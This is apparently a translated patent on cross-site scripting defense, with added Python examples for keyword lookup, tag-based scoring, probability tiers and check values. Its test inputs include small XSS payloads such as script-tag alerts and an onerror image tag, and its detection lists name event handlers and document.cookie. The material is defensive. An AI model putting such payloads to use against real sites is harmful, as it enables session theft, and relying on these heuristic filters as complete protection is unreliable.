Determining whether characters with attack capability exist in the access script code is specifically a detection of the keywords, which can be done by comparison against a signature database, or by the network definition of each keyword on the network;
When judging by comparison against the signature database, each divided keyword is looked up in a preset attack information database; if it is found in the attack information database, the script code in the external network access request that carries the found keyword is screened out according to the keyword, and then step S250 is executed for script defense processing.
In practice, the attack information database is built from the malicious code keywords obtained in routine testing of the server, and also from offensive keywords recognized on the network; of course it can also be formed by selecting certain rarely used or obscure code words according to the user's source code development habits. When a code field of this type is detected, special attention and judgment are required.
Furthermore, when determining by the definition on the network, the general or special network definition of the keyword to be detected is obtained from the network, and the definition is used to determine whether the keyword can be used for an attack; some attack code programs or special-purpose code programs are generally published on the network, and these codes can also be used to determine whether an access request is offensive.
Step S250: if such characters exist in the cross-site access script code, screening out the characters with attack capability in the cross-site access script code according to the access identifier, and performing cross-site scripting defense processing on the cross-site access script code.
In this embodiment, the cross-site scripting defense processing is mainly performed by shielding, deleting or replacing the characters with attack capability, or the entire cross-site access script code in which they are located; shielding refers to hiding the characters from the code by some special means, so as to weaken or even remove the attack capability of the code.
In practice, the choice between shielding, deletion and replacement depends on the function of the code: if the code has a special function definition, deletion cannot be used, because deletion usually causes the code to lose its ability to execute, while shielding and replacement can retain the original function of the code.
In this embodiment, the access identifier can be set in the following way: detecting the user information carried in the external network access request, and determining whether the user information is user information that a preset user rule defines as requiring protection;
if so, adding an access identifier to the external network access request according to the protection policy and access policy defined by the user rule. Preferably, the access identifier is mainly used to define the access method, but it can also define information security protection; by setting the access identifier, user information can be protected and special characters in the access can be set at the same time.
In this embodiment, for step S240, screening out the characters with attack capability in the access script code according to the access identifier can specifically be implemented as follows:
according to the access identifier and the correspondence between access identifiers and access rules, querying the access rule corresponding to the current access identifier, where the access rule contains the special characters used to implement cross-site access and the access method of the cross-site access;
filtering the characters with attack capability in the access script code according to the special characters, so that the characters that do not meet the requirements of the access rule are removed from the access script for subsequent cross-site scripting defense processing.
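Steps S240 and S250 as an added Python example that is not the patent's code: keyword lookup in an attack information database, then screening of the attack-capable characters against the access rule that the access identifier selects, so that characters the rule needs for its kind of cross-site access are not handed to defense processing. The database, the character set, the access identifiers, the rules and the sample requests are all constructed for illustration.

```python
"""Keyword lookup and access-identifier screening (steps S240 and S250).

Added example (not the patent's code). ATTACK_KEYWORDS, ATTACK_CAPABLE_CHARS,
ACCESS_RULES and the sample requests are constructed for illustration.
"""
import re

# Constructed attack information database (the patent builds it from keywords seen
# in testing and published on the network); lower-case keywords only.
ATTACK_KEYWORDS = {"onerror", "onload", "onclick", "eval", "srcdoc", "javascript"}

# Constructed set of characters treated as having attack capability in script context.
ATTACK_CAPABLE_CHARS = set("<>\"'`&;()")

# Constructed access rules keyed by access identifier: the special characters the rule
# needs for its kind of cross-site access, and the access method it selects.
ACCESS_RULES = {
    "rich-text": {"special_chars": set("<>&"), "access_method": "html-fragment"},
    "plain-search": {"special_chars": set(), "access_method": "query-string"},
}


def split_keywords(code):
    """Divide the source into keywords (identifier-like tokens), as step S240 describes."""
    return re.findall(r"[A-Za-z_][A-Za-z0-9_]*", code)


def keywords_in_database(code):
    """Keywords of the code that are present in the attack information database."""
    return sorted({k.lower() for k in split_keywords(code)} & ATTACK_KEYWORDS)


def attack_capable_chars(code):
    return {c for c in code if c in ATTACK_CAPABLE_CHARS}


def screen(code, access_identifier):
    """Step S250: drop from the attack-capable characters those that the access rule
    selected by the identifier declares as its special characters; what remains goes
    on to cross-site scripting defense. An unknown identifier trusts nothing."""
    rule = ACCESS_RULES.get(access_identifier, {"special_chars": set()})
    return attack_capable_chars(code) - rule["special_chars"]


def assess(request):
    """Run S230-S250 on a request dict {"code": str, "access_identifier": str|None}
    for which step S220 has already reported a malicious program."""
    code = request["code"]
    identifier = request.get("access_identifier")
    if identifier is None:
        return {"stage": "S230", "decision": "no access identifier: S220 result stands"}
    hits = keywords_in_database(code)
    if not hits and not attack_capable_chars(code):
        return {"stage": "S240", "decision": "no attack-capable characters"}
    remaining = screen(code, identifier)
    return {
        "stage": "S250",
        "keywords": hits,
        "remaining_chars": sorted(remaining),
        "decision": "defend" if remaining or hits else "allow",
    }
```

The same markup is allowed under the "rich-text" identifier, whose rule needs `<`, `>` and `&`, and sent to defense under "plain-search", whose rule needs none of them; a database keyword such as an inline event handler name is reported regardless of the identifier.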
In this embodiment, the specific implementation of detecting, according to the predefined lexical combination rule, whether a malicious program exists in the HTTP data packet used to respond to cross-site access within the cross-site access script code carried in the external network access request may be:
performing a simulated run according to the cross-site access script code, and capturing the active tags on each accessed page of the captured HTTP data packet during the run;
calculating the reciprocal of the probability of each active tag in the cross-site access script code, summing the reciprocals and taking their arithmetic mean as the embedded-JavaScript reasonableness index of the active tags;
classifying the cross-site access script code according to the reasonableness index;
where an active tag is a tag between which and the cross-site access script code no other active tag exists, and the probability of the tag is the probability that the active tag appears directly on the cross-site access script code.
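The active-tag reasonableness index described in the summary (reciprocals of tag probabilities, averaged) and again just above, as an added Python example that is not part of the patent. It assumes that the active tag of an inline `<script>` is its nearest enclosing element, that an element carrying an `on*` event attribute is its own active tag, that the tag probabilities come from a constructed reference table rather than from the patent's simulated run, and that the classification threshold is a constructed cut-off.

```python
"""Embedded-JavaScript reasonableness index from active tags.

Added example (not the patent's code). Assumptions: the active tag of an inline
<script> is its nearest enclosing element; an element with an on* attribute is its
own active tag; TAG_PROBABILITY is a constructed reference table; unknown tags get
MIN_PROBABILITY so the reciprocal stays finite.
"""
from html.parser import HTMLParser
from statistics import mean

# Constructed reference: probability that embedded JavaScript sits directly on a tag.
TAG_PROBABILITY = {"head": 0.55, "body": 0.30, "div": 0.10, "td": 0.02, "img": 0.01}
MIN_PROBABILITY = 0.005
VOID_TAGS = {"img", "br", "input", "meta", "link", "hr"}


class ActiveTagCollector(HTMLParser):
    """Walk one captured page and record the active tag of every piece of embedded JS."""

    def __init__(self):
        super().__init__()
        self.stack = []          # currently open elements
        self.active_tags = []    # one entry per script location

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.active_tags.append(self.stack[-1] if self.stack else "#root")
        elif any(name.lower().startswith("on") for name, _ in attrs):
            self.active_tags.append(tag)
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:                      # tolerate unclosed elements
            while self.stack.pop() != tag:
                pass


def active_tags(page_html):
    collector = ActiveTagCollector()
    collector.feed(page_html)
    collector.close()
    return collector.active_tags


def reasonableness_index(pages):
    """Arithmetic mean of 1/p over the active tags of all captured pages (0.0 if none)."""
    tags = [t for page in pages for t in active_tags(page)]
    if not tags:
        return 0.0
    return mean([1.0 / TAG_PROBABILITY.get(t, MIN_PROBABILITY) for t in tags])


def classify(pages, threshold=20.0):
    """Classify the script code by its index; threshold is a constructed cut-off."""
    index = reasonableness_index(pages)
    return index, ("reasonable" if index <= threshold else "suspicious")


# Constructed captured pages from a simulated run.
PAGE_TYPICAL = (
    "<html><head><script>init()</script></head>"
    "<body><div><script>render()</script></div></body></html>"
)
PAGE_ODD = (
    "<html><body><table><tr><td><script>x()</script></td></tr></table>"
    "<img src=x onerror=f()></body></html>"
)
```

Script hosted under `head` and `div` yields a small index, while script hosted under `td` and an event attribute on `img` yields a large one, which is what makes the averaged reciprocal useful as a classification feature: rare hosting tags dominate the mean.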
在本实施例中,根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理的步骤包括:In this embodiment, the steps of screening out characters with attack capabilities in the cross-site access script code according to the access identifier, and performing cross-site scripting defense processing on the cross-site access script code include:
提取所述跨站访问脚本代码中的具有攻击能力的字符;Extracting attack-capable characters in the cross-site access script code;
计算所述字符在所述外网访问请求中出现的概率;Calculating the probability of the character appearing in the external network access request;
比较所述概率与预设的信息泄密的概率等级之间的大小关系;Comparing the magnitude relationship between the probability and the preset probability level of information leakage;
若所述概率大于所述概率等级,则启动访问防护程序对所述访问请求进行跨站脚本防御处理。If the probability is greater than the probability level, the access protection program is activated to perform cross-site scripting defense processing on the access request.
在实际应用中,为了减低误判断的概率,在通过比对确定了代码中的某些关键词是具有攻击性的情况下,还可以对该关键字进行用于实现攻击的概率的计算,根据用于实现攻击的概率来进一步确定是否需要进行处理。In practical applications, in order to reduce the probability of misjudgment, if certain keywords in the code are determined to be offensive through comparison, the keyword can also be used to calculate the probability of an attack. Used to achieve the probability of an attack to further determine whether it needs to be processed.
进一步的,对于计算所述字符在所述外网访问请求中出现的概率包括:Further, calculating the probability that the character appears in the external network access request includes:
调取所述网络侧中出现跨站攻击的所有历史访问记录,并统计所有所述历史访问记录的跨站访问脚本代码的总数量;Retrieve all historical access records of cross-site attacks on the network side, and count the total number of cross-site access script codes of all historical access records;
统计所述字符在所述所有历史访问记录中的出现次数;Counting the number of occurrences of the character in all the historical visit records;
根据所述出现次数和所述总数量计算出所述概率。The probability is calculated based on the number of occurrences and the total number.
In practical applications, for attack detection the terminal or server generally generates an attack log that stores every record of the terminal or server being attacked; a record may hold keywords or the entire script code. A keyword that the preliminary judgment has found to be offensive is then checked against these historical records to calculate whether it is likely to be an attack character on this network side. If the calculated probability exceeds the preset upper probability limit, the character is classed as a high-risk code character, and step S240 is executed to perform cross-site scripting (XSS) defense.
In this embodiment, calculating the probability from the number of occurrences and the total number includes:
dividing the number of occurrences by the total number to obtain a percentage value;
multiplying the percentage value by a weight coefficient to obtain the final probability, calculated as follows:
Figure PCTCN2019119113-appb-000002 (the formula as described in the text: P = α × m / M)
where P is the probability of occurrence of the attack-capable character, m is the number of occurrences, M is the total number of cross-site access script codes, and α is the weight coefficient.
In this embodiment, after the final probability has been obtained in the above manner, its risk level still has to be judged. Depending on the actual situation, the probability levels are generally set to three levels according to the degree of attack, from low to high, and performing cross-site scripting defense processing on the cross-site access script code includes:
if the probability is greater than the first probability level and less than the second probability level, shielding the corresponding character or the entire code in the cross-site access script code;
if the probability is greater than the second probability level and less than the third probability level, replacing the character or the entire code in the cross-site access script code;
if the probability is greater than the third probability level, deleting the cross-site access script code from the external network access request.
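The probability calculation (P = α × m / M over the historical attack records) and the three-tier decision above, carried through on constructed data, as an added example written for this page rather than code from the patent or its applicant. The attack log, the keyword list used for the "comparison" that finds attack-capable characters, and the three numeric levels are all assumptions; the patent fixes three levels but gives no values. Function names (`occurrence_probability`, `defense_action`, `assess`) are this example's own.

```python
# Constructed attack log (an assumption for this example, not data from the patent):
# one record per past cross-site attack seen on the network side, each holding the
# attack-capable keywords extracted from that attack's script code.
ATTACK_HISTORY = [
    {"<script>", "</script>", "alert("},
    {"<img", "onerror="},
    {"<script>", "</script>", "document.cookie"},
    {"<svg", "onload="},
    {"<script>", "</script>", "javascript:"},
    {"<script>", "</script>", "alert("},
    {"<iframe", "javascript:", "alert("},
    {"<script>", "</script>", "document.cookie"},
    {"<script>", "</script>", "onload="},
    {"<script>", "</script>", "alert("},
]

# Keywords treated as attack-capable characters (assumed list; the patent only says
# keywords are found "offensive through comparison").
ATTACK_KEYWORDS = ["<script>", "</script>", "onerror=", "onload=", "onmouseover=",
                   "javascript:", "document.cookie", "alert("]

# The three probability levels, low to high (assumed values).
LEVEL_1, LEVEL_2, LEVEL_3 = 0.15, 0.35, 0.60

SEVERITY = {"none": 0, "shield": 1, "replace": 2, "delete": 3}


def extract_attack_characters(script_code):
    """Attack-capable keywords present in the script code, in order of first appearance."""
    lowered = script_code.lower()
    hits = [(lowered.find(k), k) for k in ATTACK_KEYWORDS if k in lowered]
    return [k for _, k in sorted(hits)]


def occurrence_probability(keyword, history=ATTACK_HISTORY, alpha=1.0):
    """P = alpha * m / M: m = historical attack records containing the keyword, M = all records."""
    total = len(history)  # M
    if total == 0:
        return 0.0
    occurrences = sum(1 for record in history if keyword in record)  # m
    return alpha * occurrences / total


def defense_action(probability):
    """Map P onto the three tiers. A value equal to a level falls into the lower tier (strict '>' as in the text)."""
    if probability > LEVEL_3:
        return "delete"     # drop the script code from the request
    if probability > LEVEL_2:
        return "replace"    # replace the character or the whole code
    if probability > LEVEL_1:
        return "shield"     # mask the character or the whole code
    return "none"


def assess(script_code, alpha=1.0):
    """Per-keyword (P, action) plus the strongest action, which the request as a whole receives."""
    decisions = {}
    for keyword in extract_attack_characters(script_code):
        p = occurrence_probability(keyword, alpha=alpha)
        decisions[keyword] = (round(p, 3), defense_action(p))
    overall = max((a for _, a in decisions.values()), key=SEVERITY.__getitem__, default="none")
    return decisions, overall


# Constructed request body carrying an injected script fragment.
SAMPLE_SCRIPT = "var n = 1; <script>alert(1)</script>"

if __name__ == "__main__":
    decisions, overall = assess(SAMPLE_SCRIPT)
    for keyword, (p, action) in decisions.items():
        print(f"{keyword!r}: P={p} -> {action}")
    print("overall:", overall)
```

With this log, `<script>` occurs in 7 of 10 records (P = 0.7, above the third level) while `alert(` occurs in 4 (P = 0.4, between the second and third), so the request as a whole lands in the delete tier; a keyword absent from the log scores 0 and triggers nothing, which is the misjudgment-reduction effect the text describes.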
In practical applications, different defense processing methods are selected according to the degree of attack. For example, in the replacement method, replacement can be performed as in the following example. The XSS attack information database contains the descriptive features of three kinds of XSS attack information, numbered 1, 2 and 3. If the external network access request contains "<", then "<" is replaced with a space according to the feature's replacement definition; if the request contains ">", then ">" is replaced with a space according to the feature's replacement definition; if the request contains a content string matching the regular expression <\s*script\sW.*<\s*/\s*script\s*>, it is replaced in a custom manner with "com.pingan.xxxx" according to the feature's replacement definition.
In this embodiment, the level of a malicious attack is distinguished according to the three levels above. In actual applications, however, not all script code can simply be deleted: script code that is required for the cross-site access cannot be protected by deletion or by escaping. For script code whose malicious attack level is high, protection can be implemented as follows:
when the comparison result is that the probability is greater than the third probability level, detection of the script's access function can be started in order to select a safer protection method. The implementation process is as follows:
performing a functional evaluation of the cross-site access script code to determine whether the cross-site access script code is a function access code that is required in the external network access request;
if so, keeping the cross-site access script code in the external network access request and replacing the attack-capable character with a preset safe character, the safe character being a symbol that serves only to fill the code's character positions.
Further, replacing the attack-capable character, or the entire cross-site access script code in which it is located, includes:
replacing the keywords in the character, or converting the keywords in the character into blank Chinese characters through Chinese character conversion rules, so that the character loses its attack capability.
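The three replacement definitions of the example above (features 1 to 3), together with the position-filling "safe character" and the blank-character conversion just described, as example code added for this page and not taken from the patent or its applicant. Assumptions: the regular expression printed on the page reads `<\s*script\sW.*<\s*/\s*script\s*>`, and the `\sW` in it is treated here as a transcription of `\W`; the match is made non-greedy so that each script block is replaced on its own; `_` stands in for the padding symbol and U+3000 (IDEOGRAPHIC SPACE) for the "blank Chinese character". The function names `replace_features` and `neutralize_keywords` are this example's own.

```python
import re

# Feature 3 of the page's example. The page prints <\s*script\sW.*<\s*/\s*script\s*>;
# "\sW" is taken here to be a transcription of \W (an assumption), and the match is
# non-greedy so that each script block is replaced separately rather than everything
# between the first opening and the last closing tag.
SCRIPT_BLOCK = re.compile(r"<\s*script\W.*?<\s*/\s*script\s*>", re.IGNORECASE | re.DOTALL)
CUSTOM_REPLACEMENT = "com.pingan.xxxx"   # custom replacement string from the page's example

# Assumed fillers: a padding symbol that carries no syntax (the "safe character"),
# and U+3000 IDEOGRAPHIC SPACE as the "blank Chinese character".
PADDING = "_"
BLANK_CJK = "\u3000"


def replace_features(request_body):
    """Apply the three replacement definitions of the page's example.

    The script-block rule (feature 3) runs first: features 1 and 2 turn every
    '<' and '>' into a space, after which no script block could match anymore.
    """
    body = SCRIPT_BLOCK.sub(CUSTOM_REPLACEMENT, request_body)
    return body.replace("<", " ").replace(">", " ")


def neutralize_keywords(script_code, keywords, filler=PADDING):
    """Keep the script code but overwrite each attack-capable keyword with filler
    characters of the same length, so the code's length and offsets are unchanged
    while the keyword can no longer act as code (the 'necessary code' path)."""
    for keyword in keywords:
        script_code = re.sub(re.escape(keyword),
                             lambda m: filler * len(m.group(0)),
                             script_code, flags=re.IGNORECASE)
    return script_code


# Constructed request body: a query value carrying an injected script block and a harmless tag.
SAMPLE_BODY = "q=1<script>alert(1)</script>&n=<b>x</b>"
SAMPLE_KEYWORDS = ["<script>", "</script>", "alert("]

if __name__ == "__main__":
    print(replace_features(SAMPLE_BODY))
    print(neutralize_keywords(SAMPLE_BODY, SAMPLE_KEYWORDS))
    print(neutralize_keywords(SAMPLE_BODY, SAMPLE_KEYWORDS, filler=BLANK_CJK))
```

`replace_features` turns the sample into `q=1com.pingan.xxxx&n= b x /b `: the script block is swapped for the custom string and the remaining angle brackets become spaces, which also breaks the harmless `<b>` tag, the collateral damage the text's "necessary function code" path is meant to avoid. `neutralize_keywords` leaves everything else intact and keeps the string length unchanged, so callers that rely on offsets into the code still work.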
In practical applications, attack code is rarely implanted as a complete script; inserting a character or a segment of script into the original script of the external network access request is usually enough. In that case, once detected, it can simply be deleted or shielded. Where the original script itself has been tampered with, however, replacement is required to ensure that the external network access request is invalidated; to be safe, the request can also be ignored outright and a message returned asking for the request to be resent, so that a fresh request is obtained.
Further, where the request has a special function or is not repeatable, replacement can be used so that the request still executes normally while its cross-site attack capability is removed.
Cross-site access performed by the method provided above achieves attack detection of malicious scripts in external network access requests, and shields or replaces malicious code characters so that they lose their attack capability, ensuring the security of both the access and the information.
Attacks on cross-site access are generally carried out on the base station side: an attacker monitoring the base station intercepts the access data sent by a user and then modifies part of the code in the access data or adds functions to carry out a malicious attack. This embodiment therefore proposes the cross-site attack protection method on the basis of the base station. The specific implementation process is shown in Figure 3 below:
Step S310: the base station receives a cross-site access request sent by a user through a terminal.
In this step, the cross-site access request carries identification information set according to rules pre-negotiated between the base station and the user terminal through a handshake protocol or an encrypted communication protocol. The rule for setting the identification information may be a check value algorithm: a check value is generated automatically from the access script code constructed by the user, and the object of the check value calculation is the script code itself. When that code changes, the check value naturally changes as well, and the change is reflected in the cross-site access request through the identification information.
Step S320: the base station identifies the identification information of the cross-site access request.
In this embodiment, if it is identified, this proves that the script code in the cross-site access request has been modified; otherwise it has not.
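The check value of steps S310 and S320, as example code added for this page and not taken from the patent or its applicant. The patent says only that the identification information follows a rule pre-negotiated between terminal and base station and that the check value is computed over the script code itself; this example assumes that rule is an HMAC-SHA256 under a key agreed during the handshake (a constructed demo key), so that a party without the key cannot recompute a valid value after editing the code. The names `check_value`, `build_request` and `script_modified` are this example's own.

```python
import hmac
import hashlib

# Assumed: the key agreed between terminal and base station during the handshake.
# A constructed demo value; the patent only says the identification rule is pre-negotiated.
NEGOTIATED_KEY = b"constructed-demo-key"


def check_value(script_code, key=NEGOTIATED_KEY):
    """Check value over the script code itself. HMAC-SHA256 is this example's choice
    (the patent names a check-value algorithm but not which one); keying it means a
    plain recomputation after editing the code does not yield a matching value."""
    return hmac.new(key, script_code.encode("utf-8"), hashlib.sha256).hexdigest()


def build_request(script_code, key=NEGOTIATED_KEY):
    """Terminal side (before S310): attach the identification information to the request."""
    return {"script": script_code, "identifier": check_value(script_code, key)}


def script_modified(request, key=NEGOTIATED_KEY):
    """Base-station side (S320): True when the identification information no longer
    matches the carried script code, i.e. the code was altered in transit. A missing
    identifier is treated the same way as a mismatch."""
    expected = check_value(request.get("script", ""), key)
    presented = request.get("identifier", "")
    return not hmac.compare_digest(expected, presented)


# Constructed traffic: the request as sent, the same request with code altered in
# transit, and a copy with the identification information stripped.
ORIGINAL = build_request("fetch('/api/items').then(r => r.json())")
TAMPERED = dict(ORIGINAL, script=ORIGINAL["script"] + "; alert(1)")
STRIPPED = {"script": ORIGINAL["script"]}

if __name__ == "__main__":
    print("original modified?", script_modified(ORIGINAL))
    print("tampered modified?", script_modified(TAMPERED))
    print("no identifier?", script_modified(STRIPPED))
```

`hmac.compare_digest` is used for the comparison so that the time taken does not depend on how many leading characters match. Note what this check does and does not give: it detects changes made after the terminal computed the value, which is the base-station scenario the text describes, but it says nothing about code the terminal itself already sent in a malicious form, which is why the lexical-rule and probability steps still follow it.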
Step S330: obtaining the lexical combination rules and detecting the code phrases of the cross-site access script code in the cross-site access request.
In this step, the lexical combination rules mainly detect the way functions and applets are combined in the script code; if the code has been modified, the functions or applets in the script code must have changed. The lexical combination rule thus amounts to a secondary malicious-code detection, ensuring the accuracy of malicious attack detection.
Step S340: extracting the attack characters from the cross-site access script code.
In this embodiment, the attack character above can be understood as a code function or an applet, or as some code bytes, and so on.
In this embodiment, if in steps S320 and S330 only the identification information is detected, or the script code combination is found to be incorrect, step S350 is executed; otherwise step S360 is executed.
Step S350: calculating the attack level of the attack character.
Step S360: evaluating the function level of the cross-site access script code.
Step S370: performing protection processing on the cross-site access script code.
In step S350, the attack level is calculated from the probability of the character, specifically:
retrieving all historical access records on the network side in which a cross-site attack occurred, and counting the total number of cross-site access script codes in all the historical access records;
counting the number of occurrences of the character in all the historical access records;
dividing the number of occurrences by the total number to obtain a percentage value;
multiplying the percentage value by a weight coefficient to obtain the final probability, calculated as follows:
Figure PCTCN2019119113-appb-000003 (the formula as described in the text: P = α × m / M)
where P is the probability of occurrence of the attack-capable character, m is the number of occurrences, M is the total number of cross-site access script codes, and α is the weight coefficient;
comparing the probability of the character with the preset probability of each attack level;
if the probability is greater than the first probability level and less than the second probability level, shielding the corresponding character or the entire code in the cross-site access script code;
if the probability is greater than the second probability level and less than the third probability level, replacing the character or the entire code in the cross-site access script code;
if the probability is greater than the third probability level, deleting the cross-site access script code from the external network access request.
In this embodiment, a functional evaluation of the cross-site access script code is performed to determine whether the cross-site access script code is a function access code that is required in the external network access request;
if so, the cross-site access script code is kept in the external network access request and the attack-capable character is replaced with a preset safe character, the safe character being a symbol that serves only to fill the code's character positions.
To solve the above problems, an embodiment of the present application further provides a cross-site attack protection apparatus. Referring to Figure 4, a schematic diagram of the functional modules of the cross-site attack protection apparatus provided by an embodiment of the present application, in this embodiment the apparatus includes:
an obtaining module 41, configured to obtain an external network access request received by the network side, the external network access request being a set containing at least one cross-site access script code for implementing cross-site data access;
a detection module 42, configured to detect, according to predefined lexical combination rules, whether a malicious program exists in the HTTP data packet used to respond to cross-site access in the cross-site access script code carried by the external network access request, where the lexical combination rules are a model obtained by analyzing currently known malicious attack programs; and to detect whether an access identifier exists in the cross-site access script code, where the access identifier is defined based on preset user rules;
a judging module 43, configured to judge, if the access identifier exists, whether attack-capable characters exist in the cross-site access script code;
a defense processing module 44, configured to, if such characters exist in the cross-site access script code, filter out the attack-capable characters in the cross-site access script code according to the access identifier and perform cross-site scripting defense processing on the cross-site access script code.
Since this embodiment shares its description with the embodiments of the cross-site attack protection method of the present application above, the details of the cross-site attack protection apparatus embodiment are not repeated here.
In this embodiment, by setting an access identifier in the request and detecting the lexical combination of the code, marking in this way not only improves the efficiency of identifying access script code but also improves the accuracy of identification; and where malicious attack characters are present, shielding, replacement and similar measures deprive the external network access request of its attack capability, thereby achieving cross-site attack defense, improving system security and safeguarding the website's data security.
The present application further provides a computer-readable storage medium, which may be volatile or non-volatile; the present application does not limit this.
In this embodiment, a cross-site attack protection program is stored on the computer-readable storage medium, and when executed by a processor the program implements the steps of the cross-site attack protection method described in any of the embodiments above. For the method implemented when the cross-site attack protection program is executed by the processor, reference may be made to the embodiments of the cross-site attack protection method of the present application, so it is not described again here.
The embodiments of the present application have been described above with reference to the accompanying drawings, but the present application is not limited to the specific embodiments described, which are merely illustrative and not restrictive. Inspired by the present application, those of ordinary skill in the art can devise many further forms without departing from its purpose and the scope protected by the claims. Any equivalent structure or equivalent process transformation made using the content of the description and drawings of the present application, or any direct or indirect use in other related technical fields, falls within the protection of the present application.

Claims (20)

  1. A cross-site attack protection method, comprising the following steps:
    obtaining an external network access request received by a network side, the external network access request being a set containing at least one cross-site access script code for implementing cross-site data access;
    detecting, according to predefined lexical combination rules, whether a malicious program exists in an HTTP data packet used to respond to cross-site access in the cross-site access script code carried by the external network access request, where the lexical combination rules are a model obtained by analyzing currently known malicious attack programs;
    if a malicious program is detected, detecting whether an access identifier exists in the cross-site access script code, where the access identifier is defined based on preset user rules;
    if the access identifier exists, judging whether attack-capable characters exist in the cross-site access script code;
    if such characters exist in the cross-site access script code, filtering out the attack-capable characters in the cross-site access script code according to the access identifier and performing cross-site scripting defense processing on the cross-site access script code.
  2. The cross-site attack protection method according to claim 1, wherein the step of detecting, according to the predefined lexical combination rules, whether a malicious program exists in the HTTP data packet used to respond to cross-site access in the cross-site access script code carried by the external network access request comprises:
    executing the cross-site access script code in a simulated run, and capturing the active tags on each accessed page of the HTTP data packet at run time;
    calculating the reciprocal of the tag probability of each active tag in the cross-site access script code, and summing the reciprocals to obtain an arithmetic mean as the embedded JavaScript reasonableness index of the active tags;
    classifying the cross-site access script code according to the reasonableness index;
    where an active tag is a tag between which and the cross-site access script code no other active tag lies, and the tag probability is the probability that the script code appears directly within that active tag.
  3. The cross-site attack protection method according to claim 2, wherein the step of filtering out the attack-capable characters in the cross-site access script code according to the access identifier and performing cross-site scripting defense processing on the cross-site access script code comprises:
    extracting the attack-capable characters from the cross-site access script code;
    calculating the character probability of the character appearing in the external network access request;
    comparing the character probability with a preset probability level for information leakage;
    if the character probability is greater than the probability level, starting an access protection program to perform cross-site scripting defense processing on the access request.
  4. The cross-site attack protection method according to claim 3, wherein calculating the character probability of the character appearing in the external network access request comprises:
    retrieving all historical access records on the network side in which a cross-site attack occurred, and counting the total number of cross-site access script codes in all the historical access records;
    counting the number of occurrences of the character in all the historical access records;
    calculating, from the number of occurrences and the total number, the character probability of the character appearing in the external network access request.
  5. The cross-site attack protection method according to claim 4, wherein calculating, from the number of occurrences and the total number, the character probability of the character appearing in the external network access request comprises:
    dividing the number of occurrences by the total number to obtain a percentage value;
    multiplying the percentage value by a weight coefficient to obtain the final character probability, calculated as follows:
    Figure PCTCN2019119113-appb-100001 (the formula as described in the text: P = α × m / M)
    where P is the character probability of the attack-capable character appearing, m is the number of occurrences, M is the total number of cross-site access script codes, and α is the weight coefficient.
  6. The cross-site attack protection method according to claim 3, wherein the probability levels comprise three levels ordered from low to high degree of attack, and performing cross-site scripting defense processing on the cross-site access script code comprises:
    if the character probability is greater than the first probability level and less than the second probability level, shielding the corresponding character or the entire code in the cross-site access script code;
    if the character probability is greater than the second probability level and less than the third probability level, replacing the character or the entire code in the cross-site access script code;
    if the character probability is greater than the third probability level, deleting the cross-site access script code from the external network access request.
  7. The cross-site attack protection method according to claim 6, wherein performing cross-site scripting defense processing on the cross-site access script code further comprises:
    if the character probability is greater than the third probability level, performing a functional evaluation of the cross-site access script code to determine whether the cross-site access script code is a function access code that is required in the external network access request;
    if so, keeping the cross-site access script code in the external network access request and replacing the attack-capable character with a preset safe character, the safe character being a symbol that serves only to fill the code's character positions.
  8. A cross-site attack protection apparatus, comprising:
    an obtaining module, configured to obtain an external network access request received by a network side, the external network access request being a set containing at least one cross-site access script code for implementing cross-site data access;
    a detection module, configured to detect, according to predefined lexical combination rules, whether a malicious program exists in an HTTP data packet used to respond to cross-site access in the cross-site access script code carried by the external network access request, where the lexical combination rules are a model obtained by analyzing currently known malicious attack programs; and, when a malicious program is detected, to detect whether an access identifier exists in the cross-site access script code, where the access identifier is defined based on preset user rules;
    a judging module, configured to judge, if the access identifier exists, whether attack-capable characters exist in the cross-site access script code;
    a defense processing module, configured to, if such characters exist in the cross-site access script code, filter out the attack-capable characters in the cross-site access script code according to the access identifier and perform cross-site scripting defense processing on the cross-site access script code.
  9. The cross-site attack protection apparatus according to claim 8, wherein the detection module comprises a simulated-run unit, a calculation unit and a classification unit;
    the simulated-run unit is configured to execute the cross-site access script code in a simulated run and capture the active tags on each accessed page of the HTTP data packet at run time;
    the calculation unit is configured to calculate the reciprocal of the tag probability of each active tag in the cross-site access script code, and to sum the reciprocals to obtain an arithmetic mean as the embedded JavaScript reasonableness index of the active tags;
    the classification unit is configured to classify the cross-site access script code according to the reasonableness index;
    where an active tag is a tag between which and the cross-site access script code no other active tag lies, and the tag probability is the probability that the script code appears directly within that active tag.
  10. The cross-site attack protection apparatus according to claim 9, wherein the defense processing module comprises an extraction unit, a probability calculation unit, a comparison unit and a protection unit;
    the extraction unit is configured to extract the attack-capable characters from the cross-site access script code;
    the probability calculation unit is configured to calculate the character probability of the character appearing in the external network access request;
    the comparison unit is configured to compare the character probability with a preset probability level for information leakage;
    the protection unit is configured to start an access protection program to perform cross-site scripting defense processing on the access request when the character probability is greater than the probability level.
  11. The cross-site attack protection apparatus according to claim 10, wherein the probability calculation unit is configured to:
    retrieve all historical access records on the network side in which a cross-site attack occurred, and count the total number of cross-site access script codes in all the historical access records; count the number of occurrences of the character in all the historical access records; and calculate, from the number of occurrences and the total number, the character probability of the character appearing in the external network access request.
  12. The cross-site attack protection apparatus according to claim 11, wherein the probability calculation unit is further configured to:
    divide the number of occurrences by the total number to obtain a percentage value; and multiply the percentage value by a weight coefficient to obtain the final character probability, calculated as follows:
    Figure PCTCN2019119113-appb-100002 (the formula as described in the text: P = α × m / M)
    where P is the probability of occurrence of the attack-capable character, m is the number of occurrences, M is the total number of cross-site access script codes, and α is the weight coefficient.
  13. The cross-site attack protection apparatus according to claim 10, wherein the probability levels comprise three levels ordered from low to high degree of attack, and the defense unit is configured to:
    when the character probability is greater than the first probability level and less than the second probability level, shield the corresponding character or the entire code in the cross-site access script code;
    when the character probability is greater than the second probability level and less than the third probability level, replace the character or the entire code in the cross-site access script code;
    when the character probability is greater than the third probability level, delete the cross-site access script code from the external network access request.
  14. The cross-site attack protection apparatus according to claim 13, further comprising:
    an evaluation module configured to, after the character probability has been found to be greater than the third probability level, perform a functional evaluation of the cross-site access script code to determine whether the cross-site access script code is a required functional access code of the external network access request; and, if it is, retain the cross-site access script code in the external network access request and replace the characters having attack capability with preset safe characters, the safe characters being symbols that serve only to pad the code to its original length.
